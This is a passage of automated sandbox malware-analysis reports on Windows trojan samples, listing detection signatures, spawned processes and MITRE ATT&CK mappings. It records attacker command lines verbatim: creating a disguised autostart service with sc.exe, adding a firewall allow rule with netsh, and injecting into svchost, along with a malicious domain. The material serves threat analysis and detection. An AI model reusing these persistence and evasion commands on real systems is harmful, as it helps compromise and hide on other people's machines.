"name": "Writes a PE file header to disc", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has section name .text with entropy \"6.63010280368\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has section name .text with entropy \"7.97285529131\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has section name .reloc with entropy \"6.22149605003\"\n \"ctbzjelz.exe\" has section name .text with entropy \"6.63010280368\"\n \"ctbzjelz.exe\" has section name .text with entropy \"7.97285529131\"\n \"ctbzjelz.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005548)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (UID: 00000000-00005548)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00005904)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00001588)\n Spawned process \"sc.exe\" with commandline \"create aweovprv binPath= \"%WINDIR%\\\\system32\\\\aweovprv\\\\ctbzjelz.exe /d\\\\\"C:\\\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00004644)\n Spawned process \"sc.exe\" with commandline \"description aweovprv \"wifi internet conection\"\" (UID: 00000000-00002472)\n Spawned process \"sc.exe\" with commandline \"start aweovprv\" (UID: 00000000-00002820)\n Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\"\" (UID: 00000000-00001512)\n Spawned process \"svchost.exe\" (UID: 00000000-00003044)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002528)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 576)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 544)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 544)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 544)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 256)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 508)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 508)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 508)\n \"ctbzjelz.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" allocated memory in \"C:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"ctbzjelz.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001512)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"ctbzjelz.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000b00001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start aweovprv\" (UID: 00000000-00002820)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002528)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739
https://hybrid-analysis.com/sample/308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739
Hybrid Analysis - Um_unhooking
{"size": 12635648, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739", "sha256": "308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 6, "total_processes": 9, "total_signatures": 224, "extracted_files": [{"name": "clfkcbws.exe", "file_path": "%TEMP%\\clfkcbws.exe", "file_size": 5242368, "sha256": "09859ecd37df61f69364a5e0f7e5177d3bd2e6b5c6a9d2e3f4251d113cb5456f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe (PID: 4536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "clfkcbws.exe.67B73C0E.bin", "file_size": 14974464, "sha256": "a571172ce7f55281205be49c5fb5b75bcd9397c190832abdc46db4008b9b8d5e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004536", "name": "308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe", "normalized_path": "C:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe", "sha256": "308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739", "av_label": "Trojan.BrsecmonE", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00000884", "parentuid": "00000000-00004536", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004688", "parentuid": "00000000-00004536", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\clfkcbws.exe\" %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002348", "parentuid": "00000000-00004536", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\clfkcbws.exe /d\\\"C:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004540", "parentuid": "00000000-00004536", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description njrbicei \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00000176", "parentuid": "00000000-00004536", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start njrbicei", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005336", "parentuid": "00000000-00004536", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00005112", "name": "clfkcbws.exe", "normalized_path": "%WINDIR%\\system32\\njrbicei\\clfkcbws.exe", "command_line": "/d\"C:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\"", "sha256": "a571172ce7f55281205be49c5fb5b75bcd9397c190832abdc46db4008b9b8d5e"}, {"uid": "00000000-00000364", "parentuid": "00000000-00005112", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 5, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access 